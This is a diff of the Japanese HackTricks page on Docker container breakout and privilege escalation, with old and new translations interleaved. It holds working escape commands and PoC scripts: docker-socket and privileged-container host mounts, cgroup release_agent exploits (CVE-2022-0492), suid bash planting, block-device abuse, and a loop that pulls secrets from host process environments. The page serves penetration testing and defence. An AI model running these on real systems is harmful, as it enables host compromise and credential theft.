<summary><strong>htARTE (HackTricks AWS Red Team Expert)で<strong>AWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
* **HackTricks**の[**githubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを**共有する**。
</details>
## 参考文献
* **書籍: How Linux Works, 3rd Edition: What Every Superuser Should Know By Brian Ward**

213
linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
View file

@ -1,45 +1,45 @@
# Docker Breakout / Privilege Escalation
# Docker Breakout / 特権昇格
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**する
* **ハッキングテクニックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください
</details>
<figure><img src="../../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
世界で**最も進んだ**コミュニティツールを駆使して、簡単に**ワークフローを構築し自動化する**ために[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用します。\
今すぐアクセス
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
今すぐアクセスを取得:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 自動列挙 & 脱出
## 自動列挙脱出
* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): コンテナの列挙も**できます**
* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): このツールは、入っているコンテナを列挙し、自動的に脱出を試みるのに**非常に役立ちます**
* [**amicontained**](https://github.com/genuinetools/amicontained): コンテナが持っている権限を取得し、それから脱出する方法を見つけるのに役立つツール
* [**deepce**](https://github.com/stealthcopter/deepce): コンテナの列挙と脱出をするツール
* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): **コンテナを列挙**することもできます
* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): このツールは、**現在のコンテナを列挙し、自動的に脱出を試みる**のに非常に便利です
* [**amicontained**](https://github.com/genuinetools/amicontained): コンテナが持つ権限を取得し、それから脱出する方法を見つけるための便利なツール
* [**deepce**](https://github.com/stealthcopter/deepce): コンテナからの列挙と脱出のためのツール
* [**grype**](https://github.com/anchore/grype): イメージにインストールされているソフトウェアに含まれるCVEを取得する
## マウントされたDockerソケット脱出
## マウントされたDockerソケット脱出
もし何らかの方法で**dockerソケットがdockerコンテナ内にマウントされている**ことがわかった場合、それから脱出することができます。\
これは通常、何らかの理由でdockerデーモンに接続してアクションを実行する必要があるdockerコンテナで発生します。
もし何らかの理由で、**dockerソケットがDockerコンテナ内にマウントされている**ことがわかった場合、それから脱出することができます。\
これは通常、何らかの理由でdockerコンテナがdockerデーモンに接続してアクションを実行する必要がある場合に発生します。
```bash
#Search the socket
find / -name docker.sock 2>/dev/null
#It's usually in /run/docker.sock
```
この場合、dockerデーモンと通信するために通常のdockerコマンドを使用できます
この場合、通常のdockerコマンドを使用してdockerデーモンと通信できます:
```bash
#List images to use one
docker images
@ -54,13 +54,13 @@ nsenter --target 1 --mount --uts --ipc --net --pid -- bash
docker run -it -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host ubuntu chroot /host/ bash
```
{% hint style="info" %}
**dockerソケットが予期しない場所にある場合**でも、パラメータ**`-H unix:///path/to/docker.sock`**を使用して**`docker`**コマンドで通信することができます。
**docker** ソケットが予期しない場所にある場合は、**`docker`** コマンドを使用して、パラメータ **`-H unix:///path/to/docker.sock`** を指定してそれと通信することができます。
{% endhint %}
Dockerデーモンは、[ポートデフォルトでは2375、2376でリスニングしている可能性もあります](../../../../network-services-pentesting/2375-pentesting-docker.md)。また、Systemdベースのシステムでは、Systemdソケット`fd://`を介してDockerデーモンと通信することができます。
Docker デーモンは、[ポート(デフォルトでは 2375、2376でリスニング](../../../../network-services-pentesting/2375-pentesting-docker.md)されている可能性があり、Systemd ベースのシステムでは、Docker デーモンとの通信は Systemd ソケット `fd://` を介して行われることがあります。
{% hint style="info" %}
さらに、他のレベルランタイムのランタイムソケットにも注意してください:
さらに、他のハイレベルランタイムのランタイムソケットにも注意してください:
* dockershim: `unix:///var/run/dockershim.sock`
* containerd: `unix:///run/containerd/containerd.sock`
@ -72,33 +72,33 @@ Dockerデーモンは、[ポートデフォルトでは2375、2376でリ
## Capabilities Abuse Escape
コンテナのcapabilitiesをチェックし、以下のいずれかを持っている場合、脱出することができるかもしれません**`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE, CAP_SYS_RAWIO`, `CAP_SYSLOG`, `CAP_NET_RAW`, `CAP_NET_ADMIN`**
コンテナの機能を確認する必要があります。以下のいずれかの機能がある場合、それから脱出することができるかもしれません: **`CAP_SYS_ADMIN`**、**`CAP_SYS_PTRACE`**、**`CAP_SYS_MODULE`**、**`DAC_READ_SEARCH`**、**`DAC_OVERRIDE, CAP_SYS_RAWIO`**、**`CAP_SYSLOG`**、**`CAP_NET_RAW`**、**`CAP_NET_ADMIN`**
現在のコンテナのcapabilitiesは、**以前に述べた自動ツール**を使用するか、以下の方法で確認できます:
現在のコンテナの機能を確認するには、**前述の自動ツール**または次の方法を使用できます:
```bash
capsh --print
```
以下のページでは、**Linuxの機能についてさらに学び**、それらを悪用して権限をエスケープ/エスカレーションする方法について学ぶことができます:
以下のページで**Linuxの機能について詳しく学び**、それらを乱用して特権を脱出/昇格する方法を学ぶことができます:
{% content-ref url="../../linux-capabilities.md" %}
[linux-capabilities.md](../../linux-capabilities.md)
{% endcontent-ref %}
## 特権コンテナからの脱出
## 特権付きコンテナからの脱出
特権コンテナは、`--privileged`フラグを使用するか、特定の防御を無効にすることで作成できます
特権付きコンテナは、`--privileged`フラグを使用するか、特定の防御を無効にすることで作成できます:
* `--cap-add=ALL`
* `--security-opt apparmor=unconfined`
* `--security-opt seccomp=unconfined`
* `--security-opt label=disable`
* `--security-opt label:disable`
* `--pid=host`
* `--userns=host`
* `--uts=host`
* `--cgroupns=host`
* `/dev`マウント
* `/dev`マウント
`--privileged`フラグは重大なセキュリティ上の懸念を引き起こし、エクスプロイトはそれが有効になっているDockerコンテナを起動することに依存しています。このフラグを使用すると、コンテナはすべてのデバイスへの完全なアクセス権を持ち、seccomp、AppArmor、Linuxの機能からの制限がありません。`--privileged`のすべての効果については、このページで**読むことができます**
`--privileged`フラグは、コンテナのセキュリティを著しく低下させ、**制限なしのデバイスアクセス**を提供し、**いくつかの保護をバイパス**します。詳細については、`--privileged`の完全な影響に関するドキュメントを参照してください。
{% content-ref url="../docker-privileged.md" %}
[docker-privileged.md](../docker-privileged.md)
@ -106,23 +106,23 @@ capsh --print
### 特権 + hostPID
これらの権限を持っていると、rootとしてホストで実行されているプロセスの名前空間に移動することができます。例えばinitpid:1に対して、次のコマンドを実行するだけです`nsenter --target 1 --mount --uts --ipc --net --pid -- bash`
これらの権限を持つと、単に`nsenter --target 1 --mount --uts --ipc --net --pid -- bash`を実行するだけで、ホストでrootとして実行されているプロセスinit (pid:1)など)の名前空間に移動できます。
コンテナで実行してテストします:
コンテナでテストを実行します。
```bash
docker run --rm -it --pid=host --privileged ubuntu bash
```
### 特権
特権フラグを使用するだけで、**ホストのディスクにアクセス**を試みたり、**release\_agentやその他のエスケープを悪用して脱出**を試みることができます。
特権フラグだけで、ホストのディスクにアクセスを試みたり、release\_agentを悪用して脱出を試みることができます。
以下のバイパスをコンテナで実行してテストします:
コンテナで以下のバイパスをテストしてください。
```bash
docker run --rm -it --privileged ubuntu bash
```
#### ディスクのマウント - Poc1
適切に設定されたDockerコンテナは、**fdisk -l** のようなコマンドを許可しません。しかし、フラグ `--privileged``--device=/dev/sda1` がキャップと共に誤って設定されたDockerコマンドでは、ホストドライブを見る権限を得ることが可能です。
適切に構成されたDockerコンテナは、**fdisk -l**のようなコマンドを許可しません。ただし、`--privileged`または`--device=/dev/sda1`フラグが指定されたミス構成のDockerコマンドでは、ホストドライブを見る権限をることが可能です。
![](https://bestestredteam.com/content/images/2019/08/image-16.png)
@ -131,11 +131,11 @@ docker run --rm -it --privileged ubuntu bash
mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola
```
And voilà ! ホストのファイルシステムにアクセスできるようになりました。それは `/mnt/hola` フォルダにマウントされています。
そして完成!ホストのファイルシステムにアクセスできるようになりました。これは `/mnt/hola` フォルダにマウントされています。
#### ディスクのマウント - Poc2
コンテナ内で、攻撃者はクラスターによって作成された書き込み可能なhostPathボリュームを介して基盤となるホストOSへのさらなるアクセスを試みることがあります。以下は、この攻撃ベクトルを利用できるかどうかを確認するためにコンテナ内でチェックできる一般的なことです:
コンテナ内で、攻撃者はクラスターによって作成された書き込み可能な hostPath ボリュームを介して、基礎となるホスト OS へのさらなるアクセスを試みるかもしれません。以下は、この攻撃ベクトルを利用できるかどうかを確認するためにコンテナ内でチェックできる一般的な項目です。
```bash
### Check if You Can Write to a File-system
echo 1 > /proc/sysrq-trigger
@ -156,9 +156,9 @@ mount: /mnt: permission denied. ---> Failed! but if not, you may have access to
### debugfs (Interactive File System Debugger)
debugfs /dev/sda1
```
#### 特権エスケープ 既存の release\_agent の悪用 ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC1
#### 既存のrelease\_agentを悪用した特権エスケープ[cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)- PoC1
{% code title="初期PoC" %}
{% code title="初期PoC" %}
```bash
# spawn a new container to exploit via:
# docker run --rm -it --privileged ubuntu bash
@ -192,9 +192,7 @@ sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1
# Reads the output
cat /o
```
#### 特権エスケープの悪用:作成された release\_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC2
{% code title="第二のPoC" %}
#### 特権昇格 created release\_agent の悪用([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)- PoC2
```bash
# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
@ -238,15 +236,15 @@ cat /output
```
{% endcode %}
技術の**説明**は以下で確認できます:
**技術の説明**は以下で見つけることができます:
{% content-ref url="docker-release_agent-cgroups-escape.md" %}
[docker-release\_agent-cgroups-escape.md](docker-release\_agent-cgroups-escape.md)
{% endcontent-ref %}
#### 特権エスケープ release\_agentを利用した相対パス不明時の悪用 - PoC3
#### release\_agentを悪用した特権エスケープ - 相対パスが不明な場合の PoC3
以前のエクスプロイトでは、**ホストファイルシステム内のコンテナの絶対パスが漏洩されています**。しかし、常にそうとは限りません。**ホスト内のコンテナの絶対パスが分からない場合**には、この技術を使用できます:
以前の攻撃では、**ホストのファイルシステム内のコンテナの絶対パスが公開**されていました。ただし、常にそうとは限りません。**ホスト内のコンテナの絶対パスがわからない**場合には、この技術を使用できます:
{% content-ref url="release_agent-exploit-relative-paths-to-pids.md" %}
[release\_agent-exploit-relative-paths-to-pids.md](release\_agent-exploit-relative-paths-to-pids.md)
@ -310,7 +308,7 @@ sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}
```
実行されたPoCは、特権コンテナ内で以下のような出力を提供するはずです:
特権付きコンテナ内でPoCを実行すると、次のような出力が得られるはずです:
```bash
root@container:~$ ./release_agent_pid_brute.sh
Checking pid 100
@ -338,18 +336,18 @@ root 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq]
root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]
...
```
#### 権限昇格を悪用するセンシティブなマウント
#### 特権エスケープ:機密マウントの悪用
いくつかのファイルがマウントされている可能性があり、それらは**基盤となるホストに関する情報**を提供するかもしれません。中には、何かが起こったときにホストによって実行されることを示すものもあります(これにより攻撃者はコンテナから脱出することができます)。\
これらのファイルの悪用により、以下が可能になるかもしれません:
**ホストに関する情報を提供する可能性のあるいくつかのファイルがマウントされている**かもしれません。その中には、**ホストが何かが起こったときに実行するものを示す場合もある**かもしれません(これにより攻撃者がコンテナから脱出することが可能になります)。\
これらのファイルの悪用により、次のことが可能になるかもしれません:
* release\_agent既に前述
* [binfmt\_misc](sensitive-mounts.md#proc-sys-fs-binfmt_misc)
* [core\_pattern](sensitive-mounts.md#proc-sys-kernel-core_pattern)
* [uevent\_helper](sensitive-mounts.md#sys-kernel-uevent_helper)
* [modprobe](sensitive-mounts.md#proc-sys-kernel-modprobe)
- release\_agent以前にカバー済み
- [binfmt\_misc](sensitive-mounts.md#proc-sys-fs-binfmt\_misc)
- [core\_pattern](sensitive-mounts.md#proc-sys-kernel-core\_pattern)
- [uevent\_helper](sensitive-mounts.md#sys-kernel-uevent\_helper)
- [modprobe](sensitive-mounts.md#proc-sys-kernel-modprobe)
しかし、このページで**他のセンシティブなファイル**をチェックすることもできます:
ただし、このページでチェックすべき**他の機密ファイル**を見つけることができます:
{% content-ref url="sensitive-mounts.md" %}
[sensitive-mounts.md](sensitive-mounts.md)
@ -357,14 +355,14 @@ root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]
### 任意のマウント
いくつかの場合、**コンテナにホストからのボリュームがマウントされている**ことがわかります。このボリュームが正しく設定されていない場合、**センシティブなデータにアクセス・変更する**ことができるかもしれませんシークレットの読み取り、ssh authorized\_keysの変更など。
何度かの機会に、**コンテナがホストからのボリュームをマウントしている**ことがあります。このボリュームが正しく構成されていない場合、**機密データにアクセス/変更する可能性があります**シークレットの読み取り、sshのauthorized\_keysの変更...
```bash
docker run --rm -it -v /:/host ubuntu bash
```
### 2つのシェルとホストマウントを使用した権昇格
### 2つのシェルとホストマウントを使用した権昇格
**コンテナ内でrootとしてアクセス**でき、ホストからマウントされたフォルダーがあり、**非特権ユーザーとしてホストに脱出**し、マウントされたフォルダに対する読み取りアクセス権を持っている場合、\
**コンテナ内のマウントされたフォルダ**に**bash suidファイル**を作成し、**ホストから実行**して権昇格を行うことができます。
**コンテナ内のrootとしてのアクセス権**を持ち、ホストからマウントされたフォルダを持つコンテナ内で**特権のないユーザーとしてホストに脱出**し、マウントされたフォルダに対する読み取りアクセス権を持っている場合、\
**コンテナ内のマウントされたフォルダ**に**bash suidファイル**を作成し、ホストからそれを実行して権昇格を行うことができます。
```bash
cp /bin/bash . #From non priv inside mounted folder
# You need to copy it from the host as the bash binaries might be diferent in the host and in the container
@ -372,15 +370,14 @@ chown root:root bash #From container as root inside mounted folder
chmod 4777 bash #From container as root inside mounted folder
bash -p #From non priv inside mounted folder
```
### ホスト内での権限昇格に2つのシェルを使用
### 2つのシェルを使用した特権昇格
コンテナ内で**rootとしてアクセス**があり、ホストに**非特権ユーザーとして脱出**した場合、コンテナ内にMKNODの機能がある場合デフォルトで存在、[**この投稿で説明されているように**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/)、ホスト内での権限昇格privescを悪用することができます。\
この機能を持つと、コンテナ内のrootユーザーは**ブロックデバイスファイルを作成**することが許可されます。デバイスファイルは、**基となるハードウェアやカーネルモジュールにアクセス**するために使用される特別なファイルです。えば、/dev/sdaブロックデバイスファイルは、**システムディスク上の生データを読む**アクセスを提供します。
**コンテナ内のrootとしてアクセス**権限を持ち、**特権のないユーザーとしてホストに脱出**した場合、コンテナ内でMKNODの機能デフォルトで使用可能を持っている場合、両方のシェルを悪用して**ホスト内で特権昇格**することができます。これは、[**この投稿で説明されています**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/)。\
この機能により、コンテナ内のrootユーザーは**ブロックデバイスファイルを作成**することが許可されます。デバイスファイルは、**基となるハードウェアやカーネルモジュールにアクセス**するために使用される特別なファイルです。たとえば、/dev/sdaブロックデバイスファイルは、**システムディスク上の生データを読み取る**ためのアクセスを提供します。
Dockerは、コンテナ内でブロックデバイスが**悪用されないように**、ブロックデバイスの読み書きをブロックするcgroupポリシーをコンテナに設定しています。\
しかし、コンテナ内でブロックデバイスが**作成された場合**、/proc/PID/root/フォルダを通じて、コンテナの**外側にいる人がアクセス**することができますが、制限は**プロセスがコンテナの外側と内側で同じユーザーによって所有されている必要がある**ことです。
Dockerは、コンテナ内でのブロックデバイスの誤用に対して、**ブロックデバイスの読み書き操作をブロック**するcgroupポリシーを強制します。ただし、コンテナ内で**ブロックデバイスが作成**されると、**/proc/PID/root/**ディレクトリを介してコンテナ外からアクセスできるようになります。このアクセスには、コンテナ内外の**プロセス所有者が同じである必要**があります。
この[**ライトアップ**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/)からの**悪用**例:
この[**解説**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/)からの**悪用**例:
```bash
# On the container as root
cd /
@ -418,13 +415,13 @@ HTB{7h4T_w45_Tr1cKy_1_D4r3_54y}
```
### hostPID
ホストのプロセスにアクセスできる場合、それらのプロセスに保存されている多くの機密情報にアクセスできるようになります。テストラボを実行します:
ホストのプロセスにアクセスできる場合、それらのプロセスに格納されている多くの機密情報にアクセスできるようになります。テストラボを実行します:
```
docker run --rm -it --pid=host ubuntu bash
```
例えば、`ps auxn` のようなコマンドを使用してプロセスをリストし、コマンド内の機密情報を探すことができます。
例えば、`ps auxn`のようなコマンドを使用してプロセスをリストアップし、コマンド内の機密情報を検索することができます。
その後、**ホストの各プロセスに /proc/ を通じてアクセスできるため、次のコマンドを実行して env secrets を盗むことができます**
その後、**/proc/ホスト内の各プロセスにアクセスできるため、単にその環境変数の秘密情報を盗むことができます**。
```bash
for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done
/proc/988058/environ
@ -433,7 +430,7 @@ HOSTNAME=argocd-server-69678b4f65-6mmql
USER=abrgocd
...
```
You can also **他のプロセスのファイルディスクリプタにアクセスし、開いているファイルを読むことができます**:
あなたは他のプロセスのファイルディスクリプタにアクセスし、それらのオープンされたファイルを読むこともできます。
```bash
for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \>; done > fds.txt
less fds.txt
@ -443,85 +440,85 @@ lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/4 -> /.secret.txt.swp
# You can open the secret filw with:
cat /proc/635813/fd/4
```
プロセスを**終了させてDoSを引き起こす**こともできます。
あなたはまた**プロセスを終了させ、DoSを引き起こす**ことができます。
{% hint style="warning" %}
もし何らかの方法でコンテナの外部のプロセスに対する特権的な**アクセスを持っている場合**、`nsenter --target <pid> --all` や `nsenter --target <pid> --mount --net --pid --cgroup` を実行して、そのプロセスと**同じns制限でシェルを実行**することができます(願わくば制限はありません)
もしコンテナの外側のプロセスに特権アクセスを持っている場合は、`nsenter --target <pid> --all`や`nsenter --target <pid> --mount --net --pid --cgroup`のようなコマンドを実行して、そのプロセスと同じns制限たぶんなしを持つシェルを実行することができます
{% endhint %}
### hostNetwork
```
docker run --rm -it --network=host ubuntu bash
```
### hostIPC
もしコンテナがDockerの[ホストネットワーキングドライバ(`--network=host`)](https://docs.docker.com/network/host/)で構成されている場合、そのコンテナのネットワークスタックはDockerホストから分離されていませんコンテナはホストのネットワーキング名前空間を共有しており、コンテナには独自のIPアドレスが割り当てられません。言い換えると、**コンテナはすべてのサービスを直接ホストのIPにバインド**します。さらに、コンテナは共有インターフェースでホストが送受信している**すべてのネットワークトラフィックを傍受**できます (`tcpdump -i eth0`)。
コンテナがDockerの[ホストネットワーキングドライバ (`--network=host`)](https://docs.docker.com/network/host/)で設定されている場合、そのコンテナのネットワークスタックはDockerホストから隔離されていませんコンテナはホストのネットワーキング名前空間を共有しています、そしてコンテナには独自のIPアドレスが割り当てられません。言い換えると、**コンテナはすべてのサービスを直接ホストのIPにバインドします**。さらに、コンテナは共有インターフェース`tcpdump -i eth0`でホストが送受信している**すべてのネットワークトラフィックを傍受することができます**。
例えば、これを使用してホストとメタデータインスタンス間のトラフィックを**傍受し、さらには偽装する**ことができます。
例えば、これを使用してホストとメタデータインスタンス間のトラフィックを**スニッフィングやスプーフィング**することができます。
以下の例のように:
* [Writeup: How to contact Google SRE: Dropping a shell in cloud SQL](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/)
* [Metadata service MITM allows root privilege escalation (EKS / GKE)](https://blog.champtar.fr/Metadata\_MITM\_root\_EKS\_GKE/)
- [解説: Google SREに連絡する方法: Cloud SQLにシェルをドロップする](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/)
- [メタデータサービスのMITMによるルート特権昇格EKS / GKE](https://blog.champtar.fr/Metadata\_MITM\_root\_EKS\_GKE/)
また、ホスト内の**localhostにバインドされたネットワークサービスにアクセスする**ことや、ノードの**メタデータ権限にアクセスする**こともできます(これはコンテナがアクセスできるものと異なる可能性があります)。
```
また、ホスト内で**localhostにバインドされたネットワークサービスにアクセス**したり、ノードの**メタデータ権限にアクセス**したりすることもできます(これはコンテナがアクセスできる権限と異なる場合があります)。
### hostIPC
```bash
docker run --rm -it --ipc=host ubuntu bash
```
`hostIPC=true`が設定されている場合、多くのことはできない可能性が高いです。ホスト上のプロセスや他のポッド内のプロセスがホストの**プロセス間通信メカニズム**(共有メモリ、セマフォ配列、メッセージキューなど)を使用している場合、それらのメカニズムに対して読み書きができるようになります。最初にチェックしたい場所は`/dev/shm`で、これは`hostIPC=true`を持つ任意のポッドとホストとで共有されています。また、`ipcs`を使って他のIPCメカニズムも調べたいと思うでしょう
`hostIPC=true`を使用すると、ホストのプロセス間通信IPCリソースにアクセスできます。たとえば、`/dev/shm`内の**共有メモリ**にアクセスできます。これにより、他のホストやポッドプロセスが同じIPCリソースを使用している場所に読み書きできます。これらのIPCメカニズムをさらに調査するには、`ipcs`を使用します
* **/dev/shmを調査する** - この共有メモリの場所にあるファイルを探す: `ls -la /dev/shm`
* **既存のIPC設備を調査する** - `/usr/bin/ipcs`を使って、IPC設備が使用されているかどうかを確認できます。以下でチェックしてください: `ipcs -a`
* **/dev/shmの調査** - この共有メモリの場所にあるファイルを調べます:`ls -la /dev/shm`
* **既存のIPC施設の調査** - `/usr/bin/ipcs`を使用して、使用されているIPC施設があるかどうかを確認できます。次のコマンドを使用して確認します`ipcs -a`
### 権限を回復する
### 機能の回復
システムコール**`unshare`**が禁止されていない場合、以下を実行してすべての権限を回復できます:
シスコール**`unshare`**が禁止されていない場合、次のコマンドを実行してすべての機能を回復できます:
```bash
unshare -UrmCpf bash
# Check them with
cat /proc/self/status | grep CapEff
```
### ユーザー名前空間を介したシンボリックリンクによる悪用
### シンボリックリンクを使用したユーザー名前空間の悪用
この投稿で説明されている2つ目のテクニック [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) は、ユーザー名前空間を使ったバインドマウントを悪用して、ホスト内のファイルに影響を与える方法(具体的にはファイルを削除する)を示しています
[https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) で説明されている2番目のテクニックは、ユーザー名前空間でバインドマウントを悪用して、ホスト内のファイルに影響を与える方法を示しています特定のケースでは、ファイルを削除します
<figure><img src="../../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) を使用して、世界で最も進んだコミュニティツールによって動力を供給された **ワークフローを簡単に構築し、自動化**します。
今すぐアクセス:
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) を使用して、世界で最も先進的なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
今すぐアクセスを取得
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## CVE
## CVEs
### Runc exploit (CVE-2019-5736)
rootとして `docker exec` を実行できる場合おそらくsudoを使用、CVE-2019-5736[こちら](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)のexploitを悪用してコンテナから脱出し、権限を昇格させることができます。このテクニックは基本的に **ホスト**_**/bin/sh**_ バイナリを **コンテナから上書き** し、docker execを実行する人がペイロードをトリガーする可能性があります。
`docker exec` を root として実行できる場合(おそらく sudo で、CVE-2019-5736 を悪用してコンテナから脱出して特権を昇格させることができます([こちら](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)に exploit があります)。このテクニックは、基本的に**ホスト内の** _**/bin/sh**_ **バイナリをコンテナから上書き**するものであり、docker exec を実行すると誰でもペイロードをトリガーできます。
ペイロードを適切に変更し、`go build main.go` でmain.goをビルドします。結果として得られるバイナリは、実行のためにdockerコンテナに配置する必要があります。
実行後、`[+] Overwritten /bin/sh successfully` と表示されたら、ホストマシンから次のコマンドを実行する必要があります:
ペイロードを適切に変更し、`go build main.go` で main.go をビルドします。生成されたバイナリは、実行のために docker コンテナに配置する必要があります。\
実行時に `[+] Overwritten /bin/sh successfully` と表示されると、ホストマシンから次のコマンドを実行する必要があります:
`docker exec -it <container-name> /bin/sh`
これにより、main.goファイルに存在するペイロードがトリガーされます。
これにより、main.go ファイルに存在するペイロードがトリガーされます。
詳細については[https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
詳細については: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
{% hint style="info" %}
コンテナが脆弱である可能性のある他のCVEもあります。リストは [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list) で見つけることができます。
コンテナが脆弱である可能性のある他の CVE があります。リストは[こちら](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list)で見つけることができます。
{% endhint %}
## Docker カスタムエスケープ
## Docker カスタム脱出
### Docker エスケープサーフェス
### Docker 脱出サーフェス
* **名前空間:** プロセスは名前空間を介して他のプロセスから **完全に分離される** べきで、名前空間のために他のプロセスとの相互作用はエスケープできませんデフォルトではIPC、unixソケット、ネットワークサービス、D-Bus、他のプロセスの `/proc`通信できません)。
* **Rootユーザー:** デフォルトではプロセスを実行するユーザーはrootユーザーですただし、その権限は限定されています)。
